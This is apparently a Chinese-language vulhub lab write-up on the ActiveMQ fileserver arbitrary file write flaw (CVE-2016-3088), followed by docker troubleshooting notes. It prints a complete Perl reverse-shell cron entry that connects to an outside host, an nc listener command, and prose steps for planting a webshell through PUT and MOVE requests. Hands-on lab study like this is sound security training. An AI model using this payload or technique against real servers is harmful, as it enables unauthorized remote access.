vulhub ActiveMQ任意文件写入漏洞（CVE-2016-3088）

一、背景

ActiveMQ的web控制台分三个应用，admin、api和fileserver，其中admin是管理员页面，api是接口，fileserver是储存文件的接口；admin和api都需要登录后才能使用，fileserver无需登录。

fileserver是一个RESTful API接口，我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作，其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷，但后来发现：

1. 其使用率并不高
2. 文件操作容易出现漏洞

所以，ActiveMQ在5.12.x~5.13.x版本中，已经默认关闭了fileserver这个应用（你可以在conf/jetty.xml中开启之）；在5.14.0版本以后，彻底删除了fileserver应用。

在测试过程中，可以关注ActiveMQ的版本，避免走弯路。

二、漏洞详情

本漏洞出现在fileserver应用中，漏洞原理其实非常简单，就是fileserver支持写入文件（但不解析jsp），同时支持移动文件（MOVE请求）。所以，我们只需要PUT写入一个文件，然后使用MOVE请求将其移动到任意位置，造成任意文件写入漏洞。

文件写入有几种利用方法：

1. 写入webshell
2. 写入cron或ssh key等文件
3. 写入jar或jetty.xml等库和配置文件

写入webshell的好处是，门槛低更方便，但前面也说了fileserver不解析jsp，admin和api两个应用都需要登录才能访问，所以有点鸡肋；还需要知道activemq的根目录，要把文件移动到该文件下才行，上传的jsp才能被解析。

写入cron或ssh key，好处是直接反弹拿shell（攻击机开监听nc -vnlp 21），也比较方便，缺点是需要root权限；实现方式与第一种类似。上传的cron配置文件内容。

*/1 * * * * root /usr/bin/perl -e 'use Socket;$i="10.0.0.1";$p=21;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

写入jetty.xml或jar：理论上我们可以覆盖jetty.xml，将admin和api的登录限制去掉，然后再写入webshell。有的情况下，jetty.xml和jar的所有人是web容器的用户，所以相比起来，写入crontab成功率更高一点。官方教程尚未测试。

这里仅测试了第一种方式。

三、上传webshell

1.启动环境

docker-compose up -d

2.访问activemq，查看是否启动成功

http://IP:8161/

3.burp抓包，改包，上传webshell

PUT和MOVE操作不需要登录，只有最后访问webshell时需要。这里使用的是冰蝎马，冰蝎自带的，就直接拿来用了，所以最后验证用冰蝎连接。接口返回204 No Content说明操作成功了。

这一步是需要将上传的webshell移动至activemq的根目录下，因为fileserver不解析jsp，需要转移至能解析jsp的位置，这里访问http://your-ip:8161/admin/test/systemProperties.jsp，查看ActiveMQ的绝对路径。

Destination是文件移动到的位置。

4.连接webshell

使用冰蝎连接，因为要登录才能访问，所以要在自定义请求等处加入身份认证的信息，这样才能连接成功。

小插曲一：

在vulhub/activemq/CVE-2016-3088文件夹下执行docker-compose命令时提示以下问题。

查阅资料说是dns的问题，需要修改/etc/docker/daemon.json文件，增加一行{“dns”：["8.8.8.8","8.8.4.4"]}，使用的命令是 sudo nano  /etc/docker/daemon.json。但是我再修改之后，并没有起作用，还是报错，所以打算改回去。

在修改的时候，我用nano保存不了（没搞清楚），所以采用了vi的方式将我加的这条数据删除了。这样操作之后就导致docker起不来了，由于我只修改过这一个文件，那么docker起不来，肯定是这个文件的问题。

所以为了解决问题，还是得用nano方式（nano其实是个编辑器）修改。之前操作错误是因为不知道nano如何保存，之前是误打误撞的保存了，后来研究了一下，保存方式是CTRL+O，然后回车，这时就保存了（没有保存时上方文件名位置有*号，保存完之后就消失了），然后CTRL+C、CTRL+X就退出了。这时在vulhub/activemq/CVE-2015-5254文件下重启docker成功了。所以，产生以上问题的原因应该是用nano增加数据，vi删除数据，导致文件内容不一致了。

小插曲二：

在修改完/etc/docker/daemon.json文件以后，其实还是不能在vulhub/activemq/CVE-2016-3088中执行成功docker-compose up -d命令，但是在vulhub/activemq/CVE-2015-5254就能执行成功。所以推测，出现报错应该是vulhub的问题，而不是docker的问题。这个问题之后有需要再研究吧，activemq能正常访问，就不会影响CVE-2016-3088这个漏洞的验证。